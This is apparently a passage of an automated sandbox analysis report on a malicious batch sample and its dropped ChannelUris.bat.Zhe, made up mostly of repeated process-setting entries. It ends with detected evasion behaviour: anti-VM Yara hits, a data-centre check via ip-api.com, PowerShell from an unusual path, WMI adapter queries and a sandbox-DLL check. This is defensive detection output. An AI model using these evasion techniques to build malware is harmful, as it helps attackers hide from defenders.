Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: 87M9Y3P4Z7.bat.Zhe PID: 5128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ChannelUris.bat.Zhe PID: 4892, type: MEMORYSTR

Check if machine is in data center or colocation facility

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Powershell is started from unusual location (likely to bypass HIPS)

Source: c:\users\user\appdata\roaming\channeluris.bat.zhe	Key value queried: Powershell behavior			Jump to behavior
Source: c:\users\user\desktop\87m9y3p4z7.bat.zhe	Key value queried: Powershell behavior			Jump to behavior

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000005095000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.000000000680D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2410949006.0000000000382000.00000040.00000400.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006E93000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000005783000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.00000000052F9000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Memory allocated: 2800000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Memory allocated: 2800000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: A60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 27F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: BA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Memory allocated: 4B10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Memory allocated: 4E70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: AE0000 memory reserve \| memory write watch
